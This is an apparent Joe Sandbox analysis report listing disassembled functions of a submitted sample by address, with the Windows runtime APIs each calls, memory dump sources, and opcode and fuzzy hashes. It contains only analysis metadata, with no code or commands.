                                                                                                                                                                          • Instruction ID: 7f29844b0e8134ca67c65fa9c8e12dccb4f5cc22fe65a721e5a5eeb941bf7f4a
                                                                                                                                                                          • Opcode Fuzzy Hash: 94cb295f7cb3a36e619af9ffa93204fe5f4f7a26f30a8565660f5b3c396cc469
                                                                                                                                                                          • Instruction Fuzzy Hash: A7B14B356106089FD715CF2CC48AB657BE0FF45366F258AD8E8A9CF2A1C336E995CB40
                                                                                                                                                                          Function 00B3F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B3F66A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                          • Opcode ID: d991eeba82253627388837c87dfedd13f613403faded23fc99088052afaa68ca
                                                                                                                                                                          • Instruction ID: bc9e1622672ac5bc49d39bee17d330a441d5d336fbb008026d15aec85c1025aa
                                                                                                                                                                          • Opcode Fuzzy Hash: d991eeba82253627388837c87dfedd13f613403faded23fc99088052afaa68ca
                                                                                                                                                                          • Instruction Fuzzy Hash: C1512871D0161ADBDB28CF98E9857AABBF4FB48314F2489BAD411EB260D774ED01CB50
                                                                                                                                                                          Function 00B2B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00B2B16B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 46935cc225d084c7bbb4fa68af25da43a920c65444ccfb61481ffe38e376ae29
                                                                                                                                                                          • Instruction ID: c1f757c88ebdea8bdcde5256b0e34d18f68ee1f3c3095ab9e8250ac8d2f10494
                                                                                                                                                                          • Opcode Fuzzy Hash: 46935cc225d084c7bbb4fa68af25da43a920c65444ccfb61481ffe38e376ae29
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EF01DB4D002588FDB18CB18EC92ADA73F1EB48716F1446D5D519933D0CBB4AA80CF60
                                                                                                                                                                          Function 00B240FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: gj
                                                                                                                                                                          • API String ID: 0-4203073231
                                                                                                                                                                          • Opcode ID: 8fada072f4f6f225a31c6f682f7e012d7212e3ead73703bcb171ee40a208f938
                                                                                                                                                                          • Instruction ID: 58ac7b3fe629605f0c3305c3d80b1698b9a3464288cb9d847ea56febd42d60a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 8fada072f4f6f225a31c6f682f7e012d7212e3ead73703bcb171ee40a208f938
                                                                                                                                                                          • Instruction Fuzzy Hash: C3C14672A183858FC354CF29D88065AFBE1BFC8708F19896DE998D7311D734E948CB96
                                                                                                                                                                          Function 00B3F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00B3F3A5), ref: 00B3F9DA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 98bfdf45c05133ca5b82d11f0cfbd4aaa0b4c84ed0cc398ec43c5111cd4114c1
                                                                                                                                                                          • Instruction ID: c6bd5b9f311f0b57fb5d6147f93841e595ad180c8cd89f21467b3866521bcb7a
                                                                                                                                                                          • Opcode Fuzzy Hash: 98bfdf45c05133ca5b82d11f0cfbd4aaa0b4c84ed0cc398ec43c5111cd4114c1
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          Function 00B4C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                          • Opcode ID: 29f6e9e8f213b3e5d13dd536171a0cf1c55b0e3a4cc2efa9c4f481391ae1e4e6
                                                                                                                                                                          • Instruction ID: b40df6126359794eb5abf4b3fa8f8f70c537afa51211fb299beee1047b739c2c
                                                                                                                                                                          • Opcode Fuzzy Hash: 29f6e9e8f213b3e5d13dd536171a0cf1c55b0e3a4cc2efa9c4f481391ae1e4e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 06A011302022008B83008F30AE083083AE8AA00AC230800AAA008C2230EE2080A0AB00
                                                                                                                                                                          Function 00B362CA Relevance: .8, Instructions: 829COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                                                          • Instruction ID: 1b3766faafedd3b5fedb668896054c934f2020ddc133a708c149864693badb95
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                                                          • Instruction Fuzzy Hash: A362C871604785AFCB25CF28C4906B9BBE1EF99304F28C9ADD8DA8B346D734E945CB11
                                                                                                                                                                          Function 00B377EF Relevance: .8, Instructions: 817COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                                                          • Instruction ID: 2ba64c84c7086e5b7857d84d3a434bbbf250033399441f138d6339f984b289e8
                                                                                                                                                                          • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9862FAB16487859FCB25CF28C4C06B9BBE1FF95304F2885ADE8968B346DB30E945CB15
                                                                                                                                                                          Function 00B2F461 Relevance: .7, Instructions: 694COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                                                          • Instruction ID: cba5b3c9d89f1f5ebac7afe5bbfa5ba74180aed63517b50a56a64ed99c4e07db
                                                                                                                                                                          • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                                                          • Instruction Fuzzy Hash: F9524972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                                                                          Function 00B37153 Relevance: .5, Instructions: 536COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4c650e9af9b179bc7738ad9b3317681ec5cb870fe8c4a7c2a93ba4d3d1fbe2e2
                                                                                                                                                                          • Instruction ID: dc60e625593a55a790d54907866e6318d6a947b8a5953d69dc416b2ac21d48d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c650e9af9b179bc7738ad9b3317681ec5cb870fe8c4a7c2a93ba4d3d1fbe2e2
                                                                                                                                                                          • Instruction Fuzzy Hash: BF12C2B16587069FC728CF28C8D0A79B7E0FF94304F20496EE996C7781EB34A995CB45
                                                                                                                                                                          Function 00B2C426 Relevance: .5, Instructions: 454COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a5c798c3524c84099fd609126db9ee58b6d6986616b0a31c9a0f318addc78801
                                                                                                                                                                          • Instruction ID: 118aa0999aed47eada8b9d0b3d3a62cd84cf94b18afc8c1c3614ee3fa8e5bebe
                                                                                                                                                                          • Opcode Fuzzy Hash: a5c798c3524c84099fd609126db9ee58b6d6986616b0a31c9a0f318addc78801
                                                                                                                                                                          • Instruction Fuzzy Hash: CCF1AB71A083218FC719CF28D48462EBFE1EFCA314F645AAEF48997255D730E949CB42
                                                                                                                                                                          Function 00B36CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 7e098e064a496068c191465ece618fba65c03bd28ecc5baadd1ab7fb06d5cefb
                                                                                                                                                                          • Instruction ID: 57c586db88efdd9b62ceff44d7bd1a8e599572cd3660e2358625263cedefa190
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e098e064a496068c191465ece618fba65c03bd28ecc5baadd1ab7fb06d5cefb
                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED1E8B16483449FDB24DF28C88475BBBE1FF89308F1485ADE8899B342D774E909CB56
                                                                                                                                                                          Function 00B2E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d3859232d18b5a5eb0897d9162f40548959561cd6343c24daa1810590adba64c
                                                                                                                                                                          • Instruction ID: f1694423d5388e50da8418e9966f909de58490c1cf40c10714ead03c78cfa4e8
                                                                                                                                                                          • Opcode Fuzzy Hash: d3859232d18b5a5eb0897d9162f40548959561cd6343c24daa1810590adba64c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2DE16B755083948FC314CF29D88086ABFF0EF9A300F45095EF9D497392D679EA19DBA2
                                                                                                                                                                          Function 00B34088 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                                                          • Instruction ID: debe270d1e9990dddd28186228ef06353d4ffe0b950ec405b82659818e21cfa2
                                                                                                                                                                          • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C9137B020074A9BDB24EF64DCD1BBB77D5EB50300F2009ADF59A9B282DB74B945C752
                                                                                                                                                                          Function 00B343BF Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                          • Instruction ID: b54f4d89c0195624dd58c19058febe50e7acadfa12ba8505dd00b01f1b9219a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E8127717043468BDB24DE68D8D1BBD77D4EBA1304F2009FDE98A8B282DF70A9858752
                                                                                                                                                                          Function 00B451C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c059f9981fa098db11d34e2cf241e4f7954312f5832f82e712e8d4310a1cf69
                                                                                                                                                                          • Instruction ID: 029c01072281bf69f3140ebe7eb3f1a71281b8086d1b576df144dfce6d3d6ae3
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c059f9981fa098db11d34e2cf241e4f7954312f5832f82e712e8d4310a1cf69
                                                                                                                                                                          • Instruction Fuzzy Hash: 70615731A00F0867DA389E6858957BE63D4EB42740F1406DBF483DF283D6D1DF42B61A
                                                                                                                                                                          Function 00B44F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
